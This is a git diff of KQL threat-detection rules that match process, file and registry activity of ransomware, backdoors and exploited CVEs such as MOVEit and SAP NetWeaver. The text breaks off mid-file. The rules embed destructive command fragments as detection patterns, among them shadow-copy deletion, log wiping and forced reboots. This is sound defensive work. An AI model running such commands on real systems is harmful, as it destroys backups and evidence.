a/KQL/rules-emerging-threats/Execution/potential_goofy_guineapig_backdoor_activity.kql +++ b/KQL/rules-emerging-threats/Execution/potential_goofy_guineapig_backdoor_activity.kql @@ -1,12 +1,12 @@ -// Title: Potential Goofy Guineapig Backdoor Activity -// Author: X__Junior (Nextron Systems) -// Date: 2023-05-14 -// Level: high -// Description: Detects a specific broken command that was used by Goofy-Guineapig as described by the NCSC report. -// MITRE Tactic: Execution -// Tags: attack.execution, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Potential Goofy Guineapig Backdoor Activity +// Author: X__Junior (Nextron Systems) +// Date: 2023-05-14 +// Level: high +// Description: Detects a specific broken command that was used by Goofy-Guineapig as described by the NCSC report. +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains "choice /t %d /d y /n >nul" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_kamikakabot_activity_lure_document_execution.kql b/KQL/rules-emerging-threats/Execution/potential_kamikakabot_activity_lure_document_execution.kql index f8b17238..bef6bc6f 100644 --- a/KQL/rules-emerging-threats/Execution/potential_kamikakabot_activity_lure_document_execution.kql +++ b/KQL/rules-emerging-threats/Execution/potential_kamikakabot_activity_lure_document_execution.kql @@ -1,11 +1,11 @@ -// Title: Potential KamiKakaBot Activity - Lure Document Execution -// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) -// Date: 2024-03-22 -// Level: medium -// Description: Detects the execution of a Word document via the WinWord Start Menu shortcut. -// This behavior was observed being used by KamiKakaBot samples in order to initiate the 2nd stage of the infection. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059, detection.emerging-threats - -DeviceProcessEvents +// Title: Potential KamiKakaBot Activity - Lure Document Execution +// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) +// Date: 2024-03-22 +// Level: medium +// Description: Detects the execution of a Word document via the WinWord Start Menu shortcut. +// This behavior was observed being used by KamiKakaBot samples in order to initiate the 2nd stage of the infection. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, detection.emerging-threats + +DeviceProcessEvents | where (ProcessCommandLine contains "/c " and ProcessCommandLine contains ".lnk ~" and ProcessCommandLine contains "Start Menu\\Programs\\Word") and ProcessCommandLine endswith ".doc" and FolderPath endswith "\\cmd.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_maze_ransomware_activity.kql b/KQL/rules-emerging-threats/Execution/potential_maze_ransomware_activity.kql index 34337005..a8e307ec 100644 --- a/KQL/rules-emerging-threats/Execution/potential_maze_ransomware_activity.kql +++ b/KQL/rules-emerging-threats/Execution/potential_maze_ransomware_activity.kql @@ -1,12 +1,12 @@ -// Title: Potential Maze Ransomware Activity -// Author: Florian Roth (Nextron Systems) -// Date: 2020-05-08 -// Level: critical -// Description: Detects specific process characteristics of Maze ransomware word document droppers -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1204.002, attack.t1047, attack.impact, attack.t1490, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Potential Maze Ransomware Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2020-05-08 +// Level: critical +// Description: Detects specific process characteristics of Maze ransomware word document droppers +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002, attack.t1047, attack.impact, attack.t1490, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (FolderPath endswith ".tmp" and InitiatingProcessFolderPath endswith "\\WINWORD.exe") or (ProcessCommandLine endswith "shadowcopy delete" and FolderPath endswith "\\wmic.exe" and InitiatingProcessFolderPath contains "\\Temp\\") or (ProcessCommandLine contains "\\..\\..\\system32" and ProcessCommandLine endswith "shadowcopy delete") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql b/KQL/rules-emerging-threats/Execution/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql index 9e1f9678..7dac7d99 100644 --- a/KQL/rules-emerging-threats/Execution/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql +++ b/KQL/rules-emerging-threats/Execution/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql @@ -1,15 +1,15 @@ -// Title: Potential MOVEit Transfer CVE-2023-34362 Exploitation - Dynamic Compilation Via Csc.EXE -// Author: @kostastsale -// Date: 2023-06-01 -// Level: medium -// Description: Detects the execution of "csc.exe" via "w3wp.exe" process. MOVEit affected hosts execute "csc.exe" via the "w3wp.exe" process to dynamically compile malicious DLL files. -// MOVEit is affected by a critical vulnerability. Exploited hosts show evidence of dynamically compiling a DLL and writing it under C:\\Windows\\Microsoft\.NET\\Framework64\\v4\.0\.30319\\Temporary ASP\.NET Files\\root\\([a-z0-9]{5,12})\\([a-z0-9]{5,12})\\App_Web_[a-z0-9]{5,12}\.dll. -// Hunting Opportunity -// Events from IIS dynamically compiling binaries via the csc.exe on behalf of the MOVEit application, especially since May 27th should be investigated. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059, cve.2023-34362, detection.emerging-threats -// False Positives: -// - Initial software installation and software updates. - -DeviceProcessEvents +// Title: Potential MOVEit Transfer CVE-2023-34362 Exploitation - Dynamic Compilation Via Csc.EXE +// Author: @kostastsale +// Date: 2023-06-01 +// Level: medium +// Description: Detects the execution of "csc.exe" via "w3wp.exe" process. MOVEit affected hosts execute "csc.exe" via the "w3wp.exe" process to dynamically compile malicious DLL files. +// MOVEit is affected by a critical vulnerability. Exploited hosts show evidence of dynamically compiling a DLL and writing it under C:\\Windows\\Microsoft\.NET\\Framework64\\v4\.0\.30319\\Temporary ASP\.NET Files\\root\\([a-z0-9]{5,12})\\([a-z0-9]{5,12})\\App_Web_[a-z0-9]{5,12}\.dll. +// Hunting Opportunity +// Events from IIS dynamically compiling binaries via the csc.exe on behalf of the MOVEit application, especially since May 27th should be investigated. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, cve.2023-34362, detection.emerging-threats +// False Positives: +// - Initial software installation and software updates. + +DeviceProcessEvents | where FolderPath endswith "\\csc.exe" and InitiatingProcessCommandLine contains "moveitdmz pool" and InitiatingProcessFolderPath endswith "\\w3wp.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_qbot_activity.kql b/KQL/rules-emerging-threats/Execution/potential_qbot_activity.kql index fa85f495..8a791bae 100644 --- a/KQL/rules-emerging-threats/Execution/potential_qbot_activity.kql +++ b/KQL/rules-emerging-threats/Execution/potential_qbot_activity.kql @@ -1,12 +1,12 @@ -// Title: Potential QBot Activity -// Author: Florian Roth (Nextron Systems) -// Date: 2019-10-01 -// Level: critical -// Description: Detects potential QBot activity by looking for process executions used previously by QBot -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.005, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Potential QBot Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2019-10-01 +// Level: critical +// Description: Detects potential QBot activity by looking for process executions used previously by QBot +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.005, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (FolderPath endswith "\\wscript.exe" and InitiatingProcessFolderPath endswith "\\WinRAR.exe") or ProcessCommandLine contains " /c ping.exe -n 6 127.0.0.1 & type " or (ProcessCommandLine contains "regsvr32.exe" and ProcessCommandLine contains "C:\\ProgramData" and ProcessCommandLine contains ".tmp") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_raspberry_robin_dot_ending_file.kql b/KQL/rules-emerging-threats/Execution/potential_raspberry_robin_dot_ending_file.kql index 41679e16..acab6340 100644 --- a/KQL/rules-emerging-threats/Execution/potential_raspberry_robin_dot_ending_file.kql +++ b/KQL/rules-emerging-threats/Execution/potential_raspberry_robin_dot_ending_file.kql @@ -1,10 +1,10 @@ -// Title: Potential Raspberry Robin Dot Ending File -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-10-28 -// Level: high -// Description: Detects commandline containing reference to files ending with a "." This scheme has been seen used by raspberry-robin -// MITRE Tactic: Execution -// Tags: attack.execution, detection.emerging-threats - -DeviceProcessEvents +// Title: Potential Raspberry Robin Dot Ending File +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-28 +// Level: high +// Description: Detects commandline containing reference to files ending with a "." This scheme has been seen used by raspberry-robin +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats + +DeviceProcessEvents | where ProcessCommandLine matches regex "\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ "']{1}" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation.kql b/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation.kql index 28a6bee9..c1b9e1cc 100644 --- a/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation.kql +++ b/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation.kql @@ -1,13 +1,13 @@ -// Title: Potential SAP NetWeaver Webshell Creation -// Author: Elastic (idea), Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-04-28 -// Level: medium -// Description: Detects the creation of suspicious files (jsp, java, class) in SAP NetWeaver directories, -// which may indicate exploitation attempts of vulnerabilities such as CVE-2025-31324. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.initial-access, attack.t1190, attack.persistence, attack.t1059.003, cve.2025-31324, detection.emerging-threats -// False Positives: -// - Legitimate creation of jsc or java files in these locations - -DeviceFileEvents +// Title: Potential SAP NetWeaver Webshell Creation +// Author: Elastic (idea), Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-04-28 +// Level: medium +// Description: Detects the creation of suspicious files (jsp, java, class) in SAP NetWeaver directories, +// which may indicate exploitation attempts of vulnerabilities such as CVE-2025-31324. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.initial-access, attack.t1190, attack.persistence, attack.t1059.003, cve.2025-31324, detection.emerging-threats +// False Positives: +// - Legitimate creation of jsc or java files in these locations + +DeviceFileEvents | where (FolderPath endswith ".jsp" or FolderPath endswith ".java" or FolderPath endswith ".class") and (FolderPath contains "\\j2ee\\cluster\\apps\\sap.com\\irj\\servlet_jsp\\irj\\work" or FolderPath contains "\\j2ee\\cluster\\apps\\sap.com\\irj\\servlet_jsp\\irj\\root") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation_linux.kql b/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation_linux.kql index 8b541c12..743b351e 100644 --- a/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation_linux.kql +++ b/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation_linux.kql @@ -1,13 +1,13 @@ -// Title: Potential SAP NetWeaver Webshell Creation - Linux -// Author: Elastic (idea), Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-04-28 -// Level: medium -// Description: Detects the creation of suspicious files (jsp, java, class) in SAP NetWeaver directories, -// which may indicate exploitation attempts of vulnerabilities such as CVE-2025-31324. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.initial-access, attack.t1190, attack.persistence, attack.t1059.003, cve.2025-31324, detection.emerging-threats -// False Positives: -// - Legitimate creation of jsc or java files in these locations - -DeviceFileEvents +// Title: Potential SAP NetWeaver Webshell Creation - Linux +// Author: Elastic (idea), Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-04-28 +// Level: medium +// Description: Detects the creation of suspicious files (jsp, java, class) in SAP NetWeaver directories, +// which may indicate exploitation attempts of vulnerabilities such as CVE-2025-31324. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.initial-access, attack.t1190, attack.persistence, attack.t1059.003, cve.2025-31324, detection.emerging-threats +// False Positives: +// - Legitimate creation of jsc or java files in these locations + +DeviceFileEvents | where (FolderPath endswith ".jsp" or FolderPath endswith ".java" or FolderPath endswith ".class") and (FolderPath contains "/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/work/" or FolderPath contains "/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root/") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_binary_indicator.kql b/KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_binary_indicator.kql index 8d6a2a38..9791ec11 100644 --- a/KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_binary_indicator.kql +++ b/KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_binary_indicator.kql @@ -1,12 +1,12 @@ -// Title: Potential SNAKE Malware Installation Binary Indicator -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-04 -// Level: high -// Description: Detects a specific binary name seen used by SNAKE malware during its installation as described by CISA in their report -// MITRE Tactic: Execution -// Tags: attack.execution, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Potential SNAKE Malware Installation Binary Indicator +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-04 +// Level: high +// Description: Detects a specific binary name seen used by SNAKE malware during its installation as described by CISA in their report +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (FolderPath endswith "\\jpsetup.exe" or FolderPath endswith "\\jpinst.exe") and (not((ProcessCommandLine =~ "" or (ProcessCommandLine in~ ("jpinst.exe", "jpinst", "jpsetup.exe", "jpsetup")) or isnull(ProcessCommandLine)))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_cli_arguments_indicator.kql b/KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_cli_arguments_indicator.kql index de289055..821c449b 100644 --- a/KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_cli_arguments_indicator.kql +++ b/KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_cli_arguments_indicator.kql @@ -1,12 +1,12 @@ -// Title: Potential SNAKE Malware Installation CLI Arguments Indicator -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-04 -// Level: high -// Description: Detects a specific command line arguments sequence seen used by SNAKE malware during its installation as described by CISA in their report -// MITRE Tactic: Execution -// Tags: attack.execution, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Potential SNAKE Malware Installation CLI Arguments Indicator +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-04 +// Level: high +// Description: Detects a specific command line arguments sequence seen used by SNAKE malware during its installation as described by CISA in their report +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine matches regex "\\s[a-fA-F0-9]{64}\\s[a-fA-F0-9]{16}" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_snake_malware_persistence_service_execution.kql b/KQL/rules-emerging-threats/Execution/potential_snake_malware_persistence_service_execution.kql index beb21616..7e3d7d4b 100644 --- a/KQL/rules-emerging-threats/Execution/potential_snake_malware_persistence_service_execution.kql +++ b/KQL/rules-emerging-threats/Execution/potential_snake_malware_persistence_service_execution.kql @@ -1,10 +1,10 @@ -// Title: Potential SNAKE Malware Persistence Service Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-04 -// Level: high -// Description: Detects a specific child/parent process relationship indicative of a "WerFault" process running from the "WinSxS" as a service. This could be indicative of potential SNAKE malware activity as reported by CISA. -// MITRE Tactic: Execution -// Tags: attack.execution, detection.emerging-threats - -DeviceProcessEvents +// Title: Potential SNAKE Malware Persistence Service Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-04 +// Level: high +// Description: Detects a specific child/parent process relationship indicative of a "WerFault" process running from the "WinSxS" as a service. This could be indicative of potential SNAKE malware activity as reported by CISA. +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats + +DeviceProcessEvents | where FolderPath endswith "\\WerFault.exe" and FolderPath startswith "C:\\Windows\\WinSxS\\" and InitiatingProcessFolderPath endswith "\\services.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_snatch_ransomware_activity.kql b/KQL/rules-emerging-threats/Execution/potential_snatch_ransomware_activity.kql index f7c78887..49bbc955 100644 --- a/KQL/rules-emerging-threats/Execution/potential_snatch_ransomware_activity.kql +++ b/KQL/rules-emerging-threats/Execution/potential_snatch_ransomware_activity.kql @@ -1,12 +1,12 @@ -// Title: Potential Snatch Ransomware Activity -// Author: Florian Roth (Nextron Systems) -// Date: 2020-08-26 -// Level: high -// Description: Detects specific process characteristics of Snatch ransomware word document droppers -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1204, detection.emerging-threats -// False Positives: -// - Scripts that shutdown the system immediately and reboot them in safe mode are unlikely - -DeviceProcessEvents +// Title: Potential Snatch Ransomware Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2020-08-26 +// Level: high +// Description: Detects specific process characteristics of Snatch ransomware word document droppers +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204, detection.emerging-threats +// False Positives: +// - Scripts that shutdown the system immediately and reboot them in safe mode are unlikely + +DeviceProcessEvents | where ProcessCommandLine matches regex "shutdown\\s+/r /f /t 00" or ProcessCommandLine matches regex "net\\s+stop SuperBackupMan" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/printernightmare_mimikatz_driver_name.kql b/KQL/rules-emerging-threats/Execution/printernightmare_mimikatz_driver_name.kql index b4dc7b88..3bbdf80f 100644 --- a/KQL/rules-emerging-threats/Execution/printernightmare_mimikatz_driver_name.kql +++ b/KQL/rules-emerging-threats/Execution/printernightmare_mimikatz_driver_name.kql @@ -1,12 +1,12 @@ -// Title: PrinterNightmare Mimikatz Driver Name -// Author: Markus Neis, @markus_neis, Florian Roth -// Date: 2021-07-04 -// Level: critical -// Description: Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527 -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1204, cve.2021-1675, cve.2021-34527, detection.emerging-threats -// False Positives: -// - Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely) - -DeviceRegistryEvents +// Title: PrinterNightmare Mimikatz Driver Name +// Author: Markus Neis, @markus_neis, Florian Roth +// Date: 2021-07-04 +// Level: critical +// Description: Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527 +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204, cve.2021-1675, cve.2021-34527, detection.emerging-threats +// False Positives: +// - Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely) + +DeviceRegistryEvents | where (RegistryKey endswith "\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\QMS 810*" or RegistryKey contains "\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\mimikatz") or (RegistryKey contains "legitprinter" and RegistryKey contains "\\Control\\Print\\Environments\\Windows") or ((RegistryKey contains "\\Control\\Print\\Environments" or RegistryKey contains "\\CurrentVersion\\Print\\Printers") and (RegistryKey contains "Gentil Kiwi" or RegistryKey contains "mimikatz printer" or RegistryKey contains "Kiwi Legit Printer")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/qakbot_uninstaller_execution.kql b/KQL/rules-emerging-threats/Execution/qakbot_uninstaller_execution.kql index db5ce9c1..f05ad122 100644 --- a/KQL/rules-emerging-threats/Execution/qakbot_uninstaller_execution.kql +++ b/KQL/rules-emerging-threats/Execution/qakbot_uninstaller_execution.kql @@ -1,12 +1,12 @@ -// Title: Qakbot Uninstaller Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2023-08-31 -// Level: high -// Description: Detects the execution of the Qakbot uninstaller file mentioned in the USAO-CDCA document on the disruption of the Qakbot malware and botnet -// MITRE Tactic: Execution -// Tags: attack.execution, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Qakbot Uninstaller Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2023-08-31 +// Level: high +// Description: Detects the execution of the Qakbot uninstaller file mentioned in the USAO-CDCA document on the disruption of the Qakbot malware and botnet +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where FolderPath endswith "\\QbotUninstall.exe" or (SHA256 startswith "423A9D13D410E2DC38EABB9FDF3121D2072472D0426260283A638B822DCD5180" or SHA256 startswith "559CAE635F0D870652B9482EF436B31D4BB1A5A0F51750836F328D749291D0B6" or SHA256 startswith "855EB5481F77DDE5AD8FA6E9D953D4AEBC280DDDF9461144B16ED62817CC5071" or SHA256 startswith "FAB408536AA37C4ABC8BE97AB9C1F86CB33B63923D423FDC2859EB9D63FA8EA0") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/raspberry_robin_initial_execution_from_external_drive.kql b/KQL/rules-emerging-threats/Execution/raspberry_robin_initial_execution_from_external_drive.kql index 5d31244e..28c17306 100644 --- a/KQL/rules-emerging-threats/Execution/raspberry_robin_initial_execution_from_external_drive.kql +++ b/KQL/rules-emerging-threats/Execution/raspberry_robin_initial_execution_from_external_drive.kql @@ -1,12 +1,12 @@ -// Title: Raspberry Robin Initial Execution From External Drive -// Author: @kostastsale -// Date: 2022-05-06 -// Level: high -// Description: Detects the initial execution of the Raspberry Robin malware from an external drive using "Cmd.EXE". -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Raspberry Robin Initial Execution From External Drive +// Author: @kostastsale +// Date: 2022-05-06 +// Level: high +// Description: Detects the initial execution of the Raspberry Robin malware from an external drive using "Cmd.EXE". +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "http:" or ProcessCommandLine contains "https:") and ((ProcessCommandLine contains "-q" or ProcessCommandLine contains "/q" or ProcessCommandLine contains "–q" or ProcessCommandLine contains "—q" or ProcessCommandLine contains "―q") and FolderPath endswith "\\msiexec.exe") and (InitiatingProcessCommandLine contains "/r" and (InitiatingProcessCommandLine endswith ".bin" or InitiatingProcessCommandLine endswith ".ico" or InitiatingProcessCommandLine endswith ".lnk" or InitiatingProcessCommandLine endswith ".lo" or InitiatingProcessCommandLine endswith ".sv" or InitiatingProcessCommandLine endswith ".usb") and InitiatingProcessFolderPath endswith "\\cmd.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/raspberry_robin_subsequent_execution_of_commands.kql b/KQL/rules-emerging-threats/Execution/raspberry_robin_subsequent_execution_of_commands.kql index 0e2abbb2..9379fc4c 100644 --- a/KQL/rules-emerging-threats/Execution/raspberry_robin_subsequent_execution_of_commands.kql +++ b/KQL/rules-emerging-threats/Execution/raspberry_robin_subsequent_execution_of_commands.kql @@ -1,12 +1,12 @@ -// Title: Raspberry Robin Subsequent Execution of Commands -// Author: @kostastsale -// Date: 2022-05-06 -// Level: high -// Description: Detects raspberry robin subsequent execution of commands. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Raspberry Robin Subsequent Execution of Commands +// Author: @kostastsale +// Date: 2022-05-06 +// Level: high +// Description: Detects raspberry robin subsequent execution of commands. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "installdriver" or ProcessCommandLine contains "setfiledsndir" or ProcessCommandLine contains "vkipdse") and (ProcessCommandLine contains "odbcconf.exe" and ProcessCommandLine contains "regsvr" and ProcessCommandLine contains "shellexec_rundll") and (ProcessCommandLine endswith "-a" or ProcessCommandLine endswith "/a" or ProcessCommandLine endswith "–a" or ProcessCommandLine endswith "—a" or ProcessCommandLine endswith "―a" or ProcessCommandLine endswith "-f" or ProcessCommandLine endswith "/f" or ProcessCommandLine endswith "–f" or ProcessCommandLine endswith "—f" or ProcessCommandLine endswith "―f" or ProcessCommandLine endswith "-s" or ProcessCommandLine endswith "/s" or ProcessCommandLine endswith "–s" or ProcessCommandLine endswith "—s" or ProcessCommandLine endswith "―s") and (FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\regsvr32.exe") and InitiatingProcessFolderPath endswith "\\fodhelper.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/revil_kaseya_incident_malware_patterns.kql b/KQL/rules-emerging-threats/Execution/revil_kaseya_incident_malware_patterns.kql index 5dd3d844..869f074e 100644 --- a/KQL/rules-emerging-threats/Execution/revil_kaseya_incident_malware_patterns.kql +++ b/KQL/rules-emerging-threats/Execution/revil_kaseya_incident_malware_patterns.kql @@ -1,10 +1,10 @@ -// Title: REvil Kaseya Incident Malware Patterns -// Author: Florian Roth (Nextron Systems) -// Date: 2021-07-03 -// Level: critical -// Description: Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware) -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059, attack.g0115, detection.emerging-threats - -DeviceProcessEvents +// Title: REvil Kaseya Incident Malware Patterns +// Author: Florian Roth (Nextron Systems) +// Date: 2021-07-03 +// Level: critical +// Description: Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware) +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, attack.g0115, detection.emerging-threats + +DeviceProcessEvents | where (ProcessCommandLine contains "C:\\Windows\\cert.exe" or ProcessCommandLine contains "del /q /f c:\\kworking\\agent.crt" or ProcessCommandLine contains "Kaseya VSA Agent Hot-fix" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\MsMpEng.exe" or ProcessCommandLine contains "rmdir /s /q %SystemDrive%\\inetpub\\logs" or (ProcessCommandLine contains "del /s /q /f %SystemDrive%\\" and ProcessCommandLine contains ".log") or ProcessCommandLine contains "c:\\kworking1\\agent.exe" or ProcessCommandLine contains "c:\\kworking1\\agent.crt") or (FolderPath in~ ("C:\\Windows\\MsMpEng.exe", "C:\\Windows\\cert.exe", "C:\\kworking\\agent.exe", "C:\\kworking1\\agent.exe")) or (ProcessCommandLine contains "del /s /q /f" and ProcessCommandLine contains "WebPages\\Errors\\webErrorLog.txt") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/rorschach_ransomware_execution_activity.kql b/KQL/rules-emerging-threats/Execution/rorschach_ransomware_execution_activity.kql index d81d716c..667ac9f1 100644 --- a/KQL/rules-emerging-threats/Execution/rorschach_ransomware_execution_activity.kql +++ b/KQL/rules-emerging-threats/Execution/rorschach_ransomware_execution_activity.kql @@ -1,12 +1,12 @@ -// Title: Rorschach Ransomware Execution Activity -// Author: X__Junior (Nextron Systems) -// Date: 2023-04-04 -// Level: critical -// Description: Detects Rorschach ransomware execution activity -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.003, attack.t1059.001, attack.defense-evasion, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Rorschach Ransomware Execution Activity +// Author: X__Junior (Nextron Systems) +// Date: 2023-04-04 +// Level: critical +// Description: Detects Rorschach ransomware execution activity +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.003, attack.t1059.001, attack.defense-evasion, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains "11111111" and (FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netsh.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\vssadmin.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/snake_malware_installer_name_indicators.kql b/KQL/rules-emerging-threats/Execution/snake_malware_installer_name_indicators.kql index 88ef0160..5ef1bece 100644 --- a/KQL/rules-emerging-threats/Execution/snake_malware_installer_name_indicators.kql +++ b/KQL/rules-emerging-threats/Execution/snake_malware_installer_name_indicators.kql @@ -1,12 +1,12 @@ -// Title: SNAKE Malware Installer Name Indicators -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-10 -// Level: low -// Description: Detects filename indicators associated with the SNAKE malware as reported by CISA in their report -// MITRE Tactic: Execution -// Tags: attack.execution, detection.emerging-threats -// False Positives: -// - Some legitimate software was also seen using these names. Apply additional filters and use this rule as a hunting basis. - -DeviceFileEvents +// Title: SNAKE Malware Installer Name Indicators +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-10 +// Level: low +// Description: Detects filename indicators associated with the SNAKE malware as reported by CISA in their report +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Some legitimate software was also seen using these names. Apply additional filters and use this rule as a hunting basis. + +DeviceFileEvents | where FolderPath endswith "\\jpsetup.exe" or FolderPath endswith "\\jpinst.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/snake_malware_kernel_driver_file_indicator.kql b/KQL/rules-emerging-threats/Execution/snake_malware_kernel_driver_file_indicator.kql index 69a9adc5..64b7109e 100644 --- a/KQL/rules-emerging-threats/Execution/snake_malware_kernel_driver_file_indicator.kql +++ b/KQL/rules-emerging-threats/Execution/snake_malware_kernel_driver_file_indicator.kql @@ -1,12 +1,12 @@ -// Title: SNAKE Malware Kernel Driver File Indicator -// Author: Nasreddine Bencherchali (Nextron 